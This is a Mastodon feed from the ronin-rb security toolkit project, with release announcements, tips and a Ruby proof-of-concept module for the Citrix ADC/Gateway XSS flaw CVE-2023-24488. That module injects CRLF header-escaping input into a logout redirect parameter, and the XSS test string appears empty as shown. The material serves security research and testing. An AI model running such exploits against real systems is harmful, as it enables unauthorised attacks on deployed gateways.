ronin-rb

The ronin-rb project, a Ruby toolkit for security research and development.

2024-07-23

You can now browse the man-pages for every ronin command at ronin-rb.dev/docs/man/.

#ronin #roninrb #protip #manpages

2024-07-23

Did you know that you can now install shell tab completion rules for every ronin command?

ronin completion --install

#ronin #roninrb #protip #tabcompletion #shellcompletion

2024-07-22

Ronin 2.1.0 has finally been released! Lots of new stuff in this release, like new database tables, new payloads, ronin-recon, ronin-app, and more.
ronin-rb.dev/blog/2024/07/22/r
#ronin #roninrb #ruby #infosec #securitytools #recon #payloads #opensource

2024-07-20

The Ronin 2.1.0 Open Beta has now ended. Now we begin preparing the official Ronin 2.1.0 release.

2024-07-19

T-10 hours until the Ronin 2.1.0 Open Beta ends.

2024-07-19

T-2 days until the Ronin 2.1.0 Open Beta ends.

2024-07-17

T-3 days until the Ronin 2.1.0 Open Beta ends.

2024-07-15

Reminder: there are just four days remaining in the Ronin 2.1.0 Open Beta. There's still time to test Ronin 2.1.0 before it's officially released.

2024-06-20

ronin-exploits 1.0.5, ronin-payloads 0.1.5, ronin-vulns 0.1.5, ronin-web-spider 0.1.1, ronin-db-activerecord 0.1.6, ronin-core 0.1.3, and ronin-support 1.0.6 released have been released! Special thanks to @flavorjones and @mozi for the bug fixes to ronin-support and ronin-db-activerecord.

ronin-rb.dev/blog/2024/06/19/r
#roninrb #ronin #infosec #securitytools #opensource #ruby #bugfixes

2024-06-11

Although ronin-vulns xss does not currently test for XSS via Response Header Injection (hence the \r\n\r\n to escape the headers section and begin the response body section), because that is a really rare vulnerability class and a sign of a very poorly implemented HTTP server.
#CVE_2023_24488

2024-06-11

@lucian and you can also use ronin-vulns to test individual URLs for reflected XSS:

$ ronin-vulns xss https://target/oauth/idp/logout?post_logout_redirect_uri=https://example.com/

#xss #securitytools #vulnscanner #security #infosec #websec

2024-06-11

@lucian thanks, and here's how one might write a similar XSS test using ronin-exploits.
#xss #exploit #CVE_2023_24488 #security #infosec #websecurity

#!/usr/bin/env -S ronin-exploits run -f

require 'ronin/exploits/xss'

module Ronin
  module Exploits
    class CVE_2023_24488 < XSS

      register 'CVE-2023-24488'

      quality :poc
      release_date    '2024-06-11'
      disclosure_date '2023-07-10'
      advisory 'CVE-2023-24488'

      author "Postmodern", email: "postmodern.mod3@gmail.com"
      summary "PoC for CVE-2023-24488"
      description <<~DESC
        Cross site scripting vulnerability in Citrix ADC and Citrix Gateway
      DESC
      references [
        "https://ruby.social/@lucian/112596694540196455"
      ]

      base_path '/oauth/idp/logout'
      query_param 'post_logout_redirect_uri'

      #
      # Test whether the target system is vulnerable.
      #
      def test
        test_xss = %{}
        response = http_get("/oauth/idp/logout", query_params: {
          'post_logout_redirect_uri' => "\r\n\r\n#{test_xss}"
        })

        if response.code == '302' &&
           response['content-type'].include?('text/html')
          if response.body.include?(test_xss)
            Vulnerable('host is vulnerable')
          else
            NotVulnerable('host is not vulnerable')
          end
        else
          Unknown("cannot access #{url}")
        end
      end

    end
  end
end

Client Info

Server: https://mastodon.social
Version: 2025.04
Repository: https://github.com/cyevgeniy/lmst